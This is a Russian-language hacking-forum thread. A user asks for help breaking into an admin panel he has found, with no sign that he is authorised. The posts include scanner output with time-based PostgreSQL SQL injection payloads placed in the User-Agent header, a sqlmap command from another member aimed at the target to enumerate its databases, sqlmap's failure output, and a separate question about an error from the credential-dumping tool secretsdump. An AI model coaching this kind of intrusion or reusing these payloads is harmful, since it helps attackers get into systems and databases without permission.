• XSS.stack #1 – первый литературный журнал от юзеров форума

нужен хэлп в пентесте

jonni960

(L3) cache
Пользователь
Регистрация
03.01.2019
Сообщения
157
Реакции
30
Нащел нужную мне админку хочу ее вскрыть но чтото както не особо получается,сканер выдал что можно свинуть куку ибо не защищена или чтото в этом роде+к этому старая версия js 1.7 помогите люди добрые а то уже неделю голову ломаю что сделать чтоб в нее попасть((( ну или хотябы до бд добраться ощущаю себя первокласником на лекции 3го курса(((
хэлпаните что делать дальше((
 
Wc3 Worker: нужно больше золота инфы
как я понял - сканер тебе наверное намекает что хэдера HttpOnly нет, ну это тебе подходит только если XSS есть.
вот рез скана с иксрэя,ща попробую замутить скан с netsparker
upd:dokinul rez s netsparkera
 

Вложения

  • netsparker.txt
    110.5 КБ · Просмотры: 26
  • XRAY scan.txt
    995.9 КБ · Просмотры: 21
Последнее редактирование:
Плеск - это панель от хостинга. Это не админка сайта.
Версия у тебя, видимо, не JS, а библиотеки Jquery.

В твоем случае есть два варианта:
1. Забить.
2. Заплатить людям денег за пентест без гарантии результата.
 
хэлпаните осмыслить что с этим делать
Код:
URL:
https://target.url/cgi-sys/suspendedpage.cgi
Parameter:
User-Agent
Attack Details
HTTP Header input User-Agent was set to gnCSIVIZ' OR 616=(SELECT 616 FROM PG_SLEEP(6))--

Tests performed:
3ZQ1rW8A' OR 332=(SELECT 332 FROM PG_SLEEP(15))-- => 20.011
hCRvfpRY' OR 997=(SELECT 997 FROM PG_SLEEP(15))-- => 20.013
tH6wPxjh' OR 117=(SELECT 117 FROM PG_SLEEP(6))-- => 20.003
ryEoUP3o' OR 278=(SELECT 278 FROM PG_SLEEP(0))-- => 0.182
TwsdU7Xv' OR 582=(SELECT 582 FROM PG_SLEEP(3))-- => 15.322
UKtZZ4DW' OR 522=(SELECT 522 FROM PG_SLEEP(0))-- => 0.186
gnCSIVIZ' OR 616=(SELECT 616 FROM PG_SLEEP(6))-- => 19.999


Original value: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36

пихал в мап и так и сяк и нифига толку выдает эррор и ни в какую((
 
хэлпаните осмыслить что с этим делать
Код:
URL:
https://target.url/cgi-sys/suspendedpage.cgi
Parameter:
User-Agent
Attack Details
HTTP Header input User-Agent was set to gnCSIVIZ' OR 616=(SELECT 616 FROM PG_SLEEP(6))--

Tests performed:
3ZQ1rW8A' OR 332=(SELECT 332 FROM PG_SLEEP(15))-- => 20.011
hCRvfpRY' OR 997=(SELECT 997 FROM PG_SLEEP(15))-- => 20.013
tH6wPxjh' OR 117=(SELECT 117 FROM PG_SLEEP(6))-- => 20.003
ryEoUP3o' OR 278=(SELECT 278 FROM PG_SLEEP(0))-- => 0.182
TwsdU7Xv' OR 582=(SELECT 582 FROM PG_SLEEP(3))-- => 15.322
UKtZZ4DW' OR 522=(SELECT 522 FROM PG_SLEEP(0))-- => 0.186
gnCSIVIZ' OR 616=(SELECT 616 FROM PG_SLEEP(6))-- => 19.999


Original value: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36

пихал в мап и так и сяк и нифига толку выдает эррор и ни в какую((
У тебя уязвимость в юзер агенте составь запрос так чтобы мап понимал что именно в юзер агенте есть дырка . В Гугле полно статей просто напиши sqlmap user agent inj. И ещё у тебя тайм базед если ты через Тор работаешь все будет зависеть от стабильности твоего интернета .
 
хэлпаните осмыслить что с этим делать
Код:
URL:
https://target.url/cgi-sys/suspendedpage.cgi
Parameter:
User-Agent
Attack Details
HTTP Header input User-Agent was set to gnCSIVIZ' OR 616=(SELECT 616 FROM PG_SLEEP(6))--

Tests performed:
3ZQ1rW8A' OR 332=(SELECT 332 FROM PG_SLEEP(15))-- => 20.011
hCRvfpRY' OR 997=(SELECT 997 FROM PG_SLEEP(15))-- => 20.013
tH6wPxjh' OR 117=(SELECT 117 FROM PG_SLEEP(6))-- => 20.003
ryEoUP3o' OR 278=(SELECT 278 FROM PG_SLEEP(0))-- => 0.182
TwsdU7Xv' OR 582=(SELECT 582 FROM PG_SLEEP(3))-- => 15.322
UKtZZ4DW' OR 522=(SELECT 522 FROM PG_SLEEP(0))-- => 0.186
gnCSIVIZ' OR 616=(SELECT 616 FROM PG_SLEEP(6))-- => 19.999


Original value: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36

пихал в мап и так и сяк и нифига толку выдает эррор и ни в какую((
Код:
sqlmap.py -u "https://target.url/cgi-sys/suspendedpage.cgi" --dbs --risk=3 --level=5 --dbms=PostgreSQL --user-agent="*"
Если там только time-based то можно указать еще --technique=T, но лучше все векторы чекнуть, мало ли..
 
Код:
sqlmap.py -u "https://target.url/cgi-sys/suspendedpage.cgi" --dbs --risk=3 --level=5 --dbms=PostgreSQL --user-agent="*"
Если там только time-based то можно указать еще --technique=T, но лучше все векторы чекнуть, мало ли..
Ну вроде заработало чтото ищет,но почему постгрескуль ? Точнее как ты это понял😅😅😅(сорян за ламерский вопрос)
 
Приветствую всех, ребята ни у кого такая шляпа не случалась, а если случалась есть какая либо подсказка как быть ошибка данная выводится при использовании secretsdump "[-] DRSR SessionError: code: 0x20e4 - ERROR_DS_CANT_FIND_EXPECTED_NC - The naming context could not be found." использовал разные методы дампа через данную утилиту постоянно выводится такая ошибка
 
Код:
custom) HEADER parameter 'User-Agent #1*' does not seem to be injectable
[09:44:20] [CRITICAL] all tested parameters do not appear to be injectable. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
походу чтото пошло не так(
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх